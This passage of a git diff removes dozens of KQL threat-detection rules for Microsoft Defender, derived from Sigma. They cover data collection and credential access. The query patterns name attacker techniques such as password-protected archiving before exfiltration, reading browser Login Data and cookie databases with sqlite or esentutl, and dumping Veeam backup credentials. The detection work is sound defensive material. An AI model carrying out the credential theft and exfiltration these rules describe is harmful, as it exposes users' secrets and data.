or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql deleted file mode 100644 index b639138c..00000000 --- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/27 -// Level: medium -// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p" \ No newline at end of file diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql deleted file mode 100644 index 70970441..00000000 --- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/27 -// Level: medium -// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe") \ No newline at end of file diff --git a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql b/Collection/Compressed_File_Creation_Via_Tar.EXE.kql deleted file mode 100644 index c32def88..00000000 --- a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to create a compressed file. -Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql b/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql deleted file mode 100644 index f02eb771..00000000 --- a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to extract compressed file. -Adversaries may abuse various utilities in order to decompress data to avoid detection. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql deleted file mode 100644 index 2846d8ff..00000000 --- a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019/12/30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql deleted file mode 100644 index 0fb4879a..00000000 --- a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/20 -// Level: medium -// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". -// Tags: attack.credential_access, attack.collection, attack.t1056.002 -DeviceImageLoadEvents -| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql b/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql deleted file mode 100644 index 11c993e5..00000000 --- a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/27 -// Level: low -// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. -// Tags: attack.collection, attack.t1115 -DeviceProcessEvents -| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe" \ No newline at end of file diff --git a/Collection/Esentutl_Steals_Browser_Information.kql b/Collection/Esentutl_Steals_Browser_Information.kql deleted file mode 100644 index 11258b4a..00000000 --- a/Collection/Esentutl_Steals_Browser_Information.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/13 -// Level: medium -// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe -// Tags: attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache" \ No newline at end of file diff --git a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql b/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql deleted file mode 100644 index 32eb0763..00000000 --- a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/03/03 -// Level: high -// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 -// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql b/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql deleted file mode 100644 index 892b79db..00000000 --- a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community -// Date: 2019/10/21 -// Level: low -// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe" \ No newline at end of file diff --git a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql b/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql deleted file mode 100644 index b13cc722..00000000 --- a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2021/07/20 -// Level: medium -// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. -An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. - -// Tags: attack.collection, attack.t1074.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\") \ No newline at end of file diff --git a/Collection/PUA_-_Mouse_Lock_Execution.kql b/Collection/PUA_-_Mouse_Lock_Execution.kql deleted file mode 100644 index cad3d884..00000000 --- a/Collection/PUA_-_Mouse_Lock_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Cian Heasley -// Date: 2020/08/13 -// Level: medium -// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. -// Tags: attack.credential_access, attack.collection, attack.t1056.002 -DeviceProcessEvents -| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_" \ No newline at end of file diff --git a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql b/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql deleted file mode 100644 index 7a27616d..00000000 --- a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/10 -// Level: medium -// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o") \ No newline at end of file diff --git a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql b/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql deleted file mode 100644 index 754c2e8e..00000000 --- a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/05/02 -// Level: medium -// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI -// Tags: attack.collection, attack.t1115 -DeviceProcessEvents -| where ProcessCommandLine contains "Get-Clipboard" \ No newline at end of file diff --git a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql b/Collection/Rar_Usage_with_Password_and_Compression_Level.kql deleted file mode 100644 index eb0b2acf..00000000 --- a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @ROxPinTeddy -// Date: 2020/05/12 -// Level: high -// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ") \ No newline at end of file diff --git a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql b/Collection/Recon_Information_for_Export_with_Command_Prompt.kql deleted file mode 100644 index 63bb9dd0..00000000 --- a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/30 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// Tags: attack.collection, attack.t1119 -DeviceProcessEvents -| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\") \ No newline at end of file diff --git a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql deleted file mode 100644 index 6b0bdff3..00000000 --- a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/19 -// Level: medium -// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field -// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592 -DeviceProcessEvents -| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql b/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql deleted file mode 100644 index 630b3df1..00000000 --- a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: TropChaud -// Date: 2022/12/19 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. -// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql b/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql deleted file mode 100644 index fbc2f1fc..00000000 --- a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/08 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. -// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql b/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql deleted file mode 100644 index c38fcb0e..00000000 --- a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community -// Date: 2019/10/12 -// Level: medium -// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. -// Tags: attack.collection, attack.t1113 -DeviceProcessEvents -| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe" \ No newline at end of file diff --git a/Collection/Suspicious_Camera_and_Microphone_Access.kql b/Collection/Suspicious_Camera_and_Microphone_Access.kql deleted file mode 100644 index 02e3f749..00000000 --- a/Collection/Suspicious_Camera_and_Microphone_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Den Iuzvyk -// Date: 2020/06/07 -// Level: high -// Description: Detects Processes accessing the camera and microphone from suspicious folder -// Tags: attack.collection, attack.t1125, attack.t1123 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#") \ No newline at end of file diff --git a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql b/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql deleted file mode 100644 index 89728d30..00000000 --- a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no"))) \ No newline at end of file diff --git a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql b/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql deleted file mode 100644 index 4a238404..00000000 --- a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: high -// Description: Detects dump of credentials in VeeamBackup dbo -// Tags: attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe" \ No newline at end of file diff --git a/Collection/Veeam_Backup_Database_Suspicious_Query.kql b/Collection/Veeam_Backup_Database_Suspicious_Query.kql deleted file mode 100644 index f4765f5e..00000000 --- a/Collection/Veeam_Backup_Database_Suspicious_Query.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/04 -// Level: medium -// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. -// Tags: attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe") \ No newline at end of file diff --git a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql b/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql deleted file mode 100644 index c4ab53b9..00000000 --- a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sajid Nawaz Khan -// Date: 2024/06/02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - -// Tags: attack.collection, attack.t1113 -DeviceRegistryEvents -| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql b/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql deleted file mode 100644 index 198194ac..00000000 --- a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sajid Nawaz Khan -// Date: 2024/06/02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - -// Tags: attack.collection, attack.t1113 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql b/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql deleted file mode 100644 index 455bb30d..00000000 --- a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Sajid Nawaz Khan -// Date: 2024/06/02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. -Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - -// Tags: attack.collection, attack.t1113 -DeviceProcessEvents -| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete") \ No newline at end of file diff --git a/Collection/Winrar_Compressing_Dump_Files.kql b/Collection/Winrar_Compressing_Dump_Files.kql deleted file mode 100644 index 6970f434..00000000 --- a/Collection/Winrar_Compressing_Dump_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/04 -// Level: medium -// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") \ No newline at end of file diff --git a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql b/Collection/Winrar_Execution_in_Non-Standard_Folder.kql deleted file mode 100644 index f6a68209..00000000 --- a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Tigzy -// Date: 2021/11/17 -// Level: medium -// Description: Detects a suspicious winrar execution in a folder which is not the default installation folder -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\")) \ No newline at end of file diff --git a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql deleted file mode 100644 index 5a91ee73..00000000 --- a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: high -// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. -// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql deleted file mode 100644 index 7291b3f5..00000000 --- a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql +++ /dev/null @@ -1,10 +0,0 